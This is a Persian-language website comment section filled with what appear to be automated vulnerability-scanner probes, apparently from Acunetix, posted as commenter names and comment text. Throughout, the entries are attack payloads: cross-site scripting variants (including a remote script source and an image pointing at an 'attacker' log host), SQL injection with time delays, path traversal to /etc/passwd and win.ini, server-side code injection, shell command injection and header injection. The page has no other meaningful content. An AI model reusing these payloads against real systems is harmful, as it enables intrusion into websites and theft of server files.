mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۳۹نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt >prompt(992030)</ScRiPt>

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۰نوشت:

1

sample%40email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۰نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۰نوشت:

TicketBtn=ثبت نظر<script>prompt(945400)</script>

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۰نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۰نوشت:

1

1'" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۱نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۱نوشت:

1

/\\www.vulnweb.com در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۲نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۲نوشت:

TicketBtn=ثبت نظر<ScR<ScRiPt>IpT>prompt(939143)</sCr<ScRiPt>IpT>

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۲نوشت:

1

\\ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۲نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۲نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۲نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt >prompt(987344)</ScRiPt>

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۲نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۳نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۳نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?991687></ScRiPt>

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۳نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۳نوشت:

1

@@a9qrU در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۳نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۳نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<\0ScRiPt >prompt(931107)</ScRiPt>

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۴نوشت:

1

hijxobsv در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۴نوشت:

1

JyI= در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۴نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۴نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<video><source onerror="javascript:prompt(921444)">

sample%40email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۴نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۵نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۵نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۵نوشت:

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۵نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۵نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۵نوشت:

TicketBtn%3D%25d8%25ab%25d8%25a8%25d8%25aa%2520%25d9%2586%25d8%25b8%25d8%25b1%3Csvg%20onload%3Dprompt(924961)%3E

sample%40email.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۶نوشت:

1

(select convert(int,CHAR(65))) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۶نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۶نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<div style=width:expression(prompt(973353))>

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۸نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='907517'>

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۸نوشت:

1

-1 OR 2+991-991-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۸نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۸نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<body onload=prompt(944841)>

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۹نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۴۹نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911846)>

-1 OR 3+991-991-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۰نوشت:

1

mixjcbup در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۰نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۱نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img src=xyz OnErRor=prompt(954478)>

../../../../../../../../../../etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۱نوشت:

1

-1 OR 3*2<(0+5+991-991) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۱نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۲نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img/src=">" onerror=alert(985225)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۲نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۲نوشت:

TicketBtn%3d%25d8%25ab%25d8%25a8%25d8%25aa%2520%25d9%2586%25d8%25b8%25d8%25b1<ScRiPt%20>prompt(927198)</sCripT>

-1 OR 3*2>(0+5+991-991) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۳نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۳نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ScRiPt>prompt(969519)</sCripT>

../../../../../../../../../../etc/passwd\0.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۳نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۳نوشت:

-1 OR 2+703-703-1=0+0+0+1 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۴نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۴نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<input autofocus onfocus=prompt(986086)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۴نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۵نوشت:

<a HrEF=http://www.vulnweb.com></a>

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۵نوشت:

<a HrEF=jaVaScRiPT:>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۶نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۶نوشت:

[url=http://www.vulnweb.com][/url]

-1 OR 3+703-703-1=0+0+0+1 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۶نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img<!-- --> src=x onerror=alert(930780);//><!-- -->

/../..//../..//../..//../..//../..//etc/passwd\0.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۷نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1}body{acu:Expre/**/SSion(prompt(987922))}

.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۸نوشت:

1

-1 OR 3*2<(0+5+703-703) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۸نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۸نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1_f22cU <ScRiPt >prompt(952352)</ScRiPt>

/etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۹نوشت:

1

-1 OR 3*2>(0+5+703-703) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۰:۵۹نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<ifRAme sRc=902862.com></IfRamE>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۰نوشت:

1

jevtxgfp در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1<img sRc='http://attacker-967928/log.php?

-1' OR 2+943-943-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۰نوشت:

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۱نوشت:

1

ciiydoxe در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۱نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۲نوشت:

1

-1' OR 3+943-943-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۲نوشت:

1

ciiydoxe در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۲نوشت:

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۲نوشت:

1

ciiydoxe در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۳نوشت:

1

-1' OR 3*2<(0+5+943-943) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۳نوشت:

1

file:///etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۳نوشت:

1

sample%40email.tst'"()&%<acx><ScRiPt >prompt(968574)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۳نوشت:

1

/\\../\\../\\../\\../\\../\\../\\../etc/passwd در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۴نوشت:

1

'"()&%<acx><ScRiPt >prompt(994326)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۴نوشت:

1

-1' OR 3*2>(0+5+943-943) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۵نوشت:

1

WEB-INF/web.xml در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۵نوشت:

1

sample%40email.tst_953717 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۵نوشت:

1

WEB-INF\\web.xml در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۶نوشت:

1

-1" OR 2+872-872-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۷نوشت:

1

../../../../../../../../../../windows/win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۸نوشت:

1

acu8591<s1﹥s2ʺs3ʹuca8591 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۸نوشت:

1

../../../../../../../../../../boot.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۸نوشت:

1

-1" OR 3+872-872-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۹نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۹نوشت:

1

../../../../../../../../../../windows/win.ini\0.tst در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۰۹نوشت:

1

-1" OR 3*2<(0+5+872-872) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۰نوشت:

1

acu122%6xuca122AAAAA در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۰نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۰نوشت:

1

-1" OR 3*2>(0+5+872-872) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۱نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۱نوشت:

1

................windowswin.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۲نوشت:

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()= در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۲نوشت:

1

sample%40email.tst<ScRiPt >prompt(979767)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۲نوشت:

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۳نوشت:

1

..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۳نوشت:

1

sample@email.tst<script>prompt(907148)</script> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۳نوشت:

1

1 waitfor delay '0:0:9' -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۳نوشت:

1

/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۴نوشت:

1

QyYV3VkD'; waitfor delay '0:0:9' -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۴نوشت:

1

sample@email.tst<ScR<ScRiPt>IpT>prompt(953408)</sCr<ScRiPt>IpT> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۵نوشت:

1

Tx65Ncwq'); waitfor delay '0:0:3' -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۵نوشت:

1

sample%40email.tst<ScRiPt >prompt(990744)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۵نوشت:

1

Mn34fShl')); waitfor delay '0:0:3' -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۶نوشت:

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۶نوشت:

1

47Nkt86G';select pg_sleep(3); -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۶نوشت:

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۷نوشت:

1

sample%40email.tst<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965771></ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۷نوشت:

1

MqRczteC');select pg_sleep(3); -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۷نوشت:

1

sample%40email.tst<\0ScRiPt >prompt(940288)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۷نوشت:

1

unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۷نوشت:

1

NHTkCAF7'));select pg_sleep(6); -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۸نوشت:

1

sample%40email.tst<video><source onerror="javascript:prompt(983601)"> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۸نوشت:

1

WEB-INF/web.xml? در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۸نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۸نوشت:

1

sample%2540email.tst%3Csvg%20onload%3Dprompt(919689)%3E در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۹نوشت:

1

WEB-INF\\web.xml? در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۹نوشت:

1

sample%40email.tst<div style=width:expression(prompt(967612))> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۱۹نوشت:

1

sample%40email.tst<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXR در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۰نوشت:

1

sample%40email.tst<body onload=prompt(918125)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۱نوشت:

1

sample%40email.tst<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958328)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۱نوشت:

1

sample%40email.tst<img src=xyz OnErRor=prompt(941642)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۳نوشت:

1

sample%40email.tst<img/src=">" onerror=alert(950062)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۴نوشت:

1

sample%2540email.tst<ScRiPt%20>prompt(936133)</sCripT> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۴نوشت:

1

sample%40email.tst<ScRiPt>prompt(945209)</sCripT> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۵نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۶نوشت:

1

sample%40email.tst<input autofocus onfocus=prompt(966070)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۶نوشت:

1

<a HrEF=http://www.vulnweb.com></a> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۷نوشت:

1

<a HrEF=jaVaScRiPT:> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۷نوشت:

1

[url=http://www.vulnweb.com][/url] در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۸نوشت:

1

sample%40email.tst<img<!-- --> src=x onerror=alert(982869);//><!-- --> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۹نوشت:

1

sample%40email.tst}body{acu:Expre/**/SSion(prompt(986811))} در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۲۹نوشت:

1

sample%40email.tst_TLnHV <ScRiPt >prompt(940770)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۳۰نوشت:

1

sample%40email.tst<ifRAme sRc=981323.com></IfRamE> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۳۱نوشت:

1

sample%40email.tst<img sRc='http://attacker-987802/log.php? در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۰۰:۲۱:۳۱نوشت:

1

qklupneg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۴۷نوشت:

response.write(9566624*9261895)

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۴۸نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

qklupneg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۴۸نوشت:

'+response.write(9566624*9261895)+'

qklupneg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۴۹نوشت:

"+response.write(9566624*9261895)+"

qklupneg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۰نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

qklupneg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۰نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۱نوشت:

-1 OR 2+550-550-1=0+0+0+1 --

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۱نوشت:

set|set&set

qklupneg در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۱نوشت:

1

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۱نوشت:

'set|set&set'

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۲نوشت:

-1 OR 3+550-550-1=0+0+0+1 --

response.write(9640694*9706477) در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۲نوشت:

1

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۲نوشت:

"set|set&set"

'+response.write(9640694*9706477)+' در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۲نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۳نوشت:

-1 OR 3*2<(0+5+550-550) --

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۳نوشت:

set|set&set

"+response.write(9640694*9706477)+" در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۳نوشت:

1

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۳نوشت:

`set|set&set`

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۳نوشت:

-1 OR 3*2>(0+5+550-550) --

dtpewbvi در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۴نوشت:

SomeCustomInjectedHeader:injected_by_wvs

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۴نوشت:

;set|set&set;

dtpewbvi در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۴نوشت:

SomeCustomInjectedHeader:injected_by_wvs

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۴نوشت:

-1 OR 2+711-711-1=0+0+0+1

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۴نوشت:

1

dtpewbvi در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۵نوشت:

SomeCustomInjectedHeader:injected_by_wvs

dtpewbvi در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۵نوشت:

1

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۵نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۶نوشت:

../../../../../../../../../../etc/passwd

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۶نوشت:

1

dtpewbvi در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۶نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۶نوشت:

-1 OR 3+711-711-1=0+0+0+1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۷نوشت:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۷نوشت:

1

dtpewbvi در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۷نوشت:

1

SomeCustomInjectedHeader:injected_by_wvs در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۷نوشت:

1

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۸نوشت:

../../../../../../../../../../etc/passwd\0.jpg

SomeCustomInjectedHeader:injected_by_wvs در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۸نوشت:

1

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۸نوشت:

1

SomeCustomInjectedHeader:injected_by_wvs در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۹نوشت:

1

dtbnbttu در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۹نوشت:

-1 OR 3*2<(0+5+711-711)

eggekrbk در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۹نوشت:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

dmmqwuej در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۳:۵۹نوشت:

1

